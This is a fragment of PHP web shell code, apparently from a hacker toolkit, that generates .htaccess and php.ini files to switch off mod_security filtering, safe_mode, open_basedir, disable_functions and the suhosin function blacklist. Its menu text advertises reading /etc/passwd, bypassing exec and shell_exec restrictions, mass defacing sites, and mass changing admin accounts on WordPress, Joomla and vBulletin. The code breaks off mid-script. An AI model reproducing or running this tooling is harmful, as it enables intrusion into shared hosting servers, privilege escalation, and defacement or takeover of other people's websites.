suPHP Security -Simple Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass SafeMode 2014 Priv8 ';echo '
Bypass suPHP Security
';echo '

'; error_reporting(0); if(isset($_POST['gnr'])){mkdir('suPHP',0755);$rr = " SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckCookieFormat Off SecFilterCheckUnicodeEncoding Off SecFilterNormalizeCookies Off order deny,allow deny from all allow from all order deny,allow deny from all suPHP_ConfigPath ".getcwd()."/php.ini";$g = fopen('suPHP/.htaccess','w');fwrite($g,$rr);echo "

.htaccess Has Been Generated Successfully

";echo "
Click here
";}echo '

';error_reporting(0); if(isset($_POST['gnrp'])){mkdir('suPHP',0755);$rr = "safe_mode = OFFSafe_mode_gid = OFFdisable_functions = NONEdisable_classes = NONEopen_basedir = OFFsuhosin.executor.func.blacklist = NONE";$g = fopen('suPHP/php.ini','w');fwrite($g,$rr);echo "

php.ini Has Been Generated Successfully

";echo "
Click here
";}}if(isset($_GET['action']) && $_GET['action'] == 'suppet'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass Perl Security -Bypass With Zip File -Bypass system function -Bypass With exec Function -Bypass With shell_exec -Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist -Bypass Functions suPHP_ConfigPath -Bypass suPHP Security -Simple Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass SafeMode 2014 Priv8 ';echo '
Bypass Functions suPHP_ConfigPath Security
';echo '

'; error_reporting(0); if(isset($_POST['gnr'])){mkdir('suPHP2',0755);$rr = " SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckCookieFormat Off SecFilterCheckUnicodeEncoding Off SecFilterNormalizeCookies Off order deny,allow deny from all allow from all order deny,allow deny from all suPHP_ConfigPath ".getcwd()."/php.ini";$g = fopen('suPHP2/.htaccess','w');fwrite($g,$rr);echo "

.htaccess Has Been Generated Successfully

";echo "
Click here
";}echo '

';error_reporting(0); if(isset($_POST['gnrp'])){mkdir('suPHP2',0755);$rr = "safe_mode = Offdisable_functions = NONEsafe_mode_gid = OFFopen_basedir = OFF";$g = fopen('suPHP2/php.ini','w');fwrite($g,$rr);echo "

php.ini Has Been Generated Successfully

";echo "
Click here
";}}if(isset($_GET['action']) && $_GET['action'] == 'mass'){echo 'Mass Deface Dirs -Mass Change Admin Joomla -Mass Change Admin vBulletin -Mass Change Admin WordPress -Wordpress & Joomla Mass Deface -Wordpress Index Hijack Priv8 -Joomla Index Changer -Wordpress Index Changer -Cpanel & Ftp Auto Defacer ';if(!isset($_GET['code'])){?>